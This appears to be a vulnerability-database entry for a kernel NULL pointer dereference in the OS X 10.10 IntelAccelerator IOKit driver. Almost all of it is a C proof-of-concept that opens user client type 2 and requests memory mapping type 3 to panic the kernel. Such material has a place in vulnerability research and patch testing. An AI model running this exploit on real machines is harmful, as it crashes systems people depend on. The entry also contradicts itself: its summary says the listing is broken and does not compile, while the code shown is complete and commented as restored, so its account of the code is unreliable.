OS X 10.10 IOKit IntelAccelerator NULL Pointer Dereference

ID SSV:89441
Type seebug
Reporter Anonymous
Modified 2015-09-16T00:00:00


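No description provided by source. In summary, the proof-of-concept listing below locates the IntelAccelerator IOKit service, opens a user client of type 2 on it, and requests a memory mapping of type 3 through IOConnectMapMemory; according to the title, this request leads to a kernel NULL pointer dereference on OS X 10.10. Note that the listing as published has lost several lines (closing braces and the `if` guard after IOServiceMatching) and does not compile as shown.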

                                                #include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <IOKit/IOKitLib.h>

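/*
 * Regression check for the IntelAccelerator issue named in the advisory title
 * (kernel NULL pointer dereference on OS X 10.10).
 *
 * The published listing lost its closing braces and the guard after
 * IOServiceMatching(), so every run returned right after printing
 * "unable to create service matching dictionary". The control flow below is
 * restored from the surviving indentation and messages.
 *
 * Steps: look up the "IntelAccelerator" service, open a user client of
 * type 2 on it, then ask for a mapping of memory type 3 into this task.
 * What type 2 and memory type 3 mean inside the driver is not shown on the
 * page. NOTE(review): confirm against the vendor's fix notes.
 *
 * Returns 0 on every path, as the original did. Run only on a disposable
 * test machine: on an affected kernel the final call is expected to panic
 * the system rather than return.
 */
int main(void){
  kern_return_t err;

  CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
  if (!matching){
    printf("unable to create service matching dictionary\n");
    return 0;
  }

  /* IOServiceGetMatchingServices consumes the reference on `matching`,
   * so the dictionary is not released here. */
  io_iterator_t iterator = IO_OBJECT_NULL;
  err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
  if (err != KERN_SUCCESS){
    printf("no matches\n");
    return 0;
  }

  /* Only the first matching service is used. */
  io_service_t service = IOIteratorNext(iterator);
  IOObjectRelease(iterator);

  if (service == IO_OBJECT_NULL){
    printf("unable to find service\n");
    return 0;
  }
  printf("got service: %x\n", service);

  io_connect_t conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), 2, &conn);
  IOObjectRelease(service);
  if (err != KERN_SUCCESS){
    printf("unable to get user client connection\n");
    return 0;
  }
  printf("got userclient connection: %x\n", conn);

  /* With kIOMapAnywhere the kernel chooses the mapping address; `addr` and
   * `size` are in/out parameters and the initial values are placeholders. */
  mach_vm_address_t addr = 0x414100000000;
  mach_vm_size_t size = 0x1000;

  err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);

  /* Reaching this line means the kernel survived the request. Report the
   * status instead of discarding it, so a tester can tell a clean rejection
   * from a completed mapping. */
  printf("IOConnectMapMemory returned: 0x%x\n", (unsigned)err);

  IOServiceClose(conn);
  return 0;
}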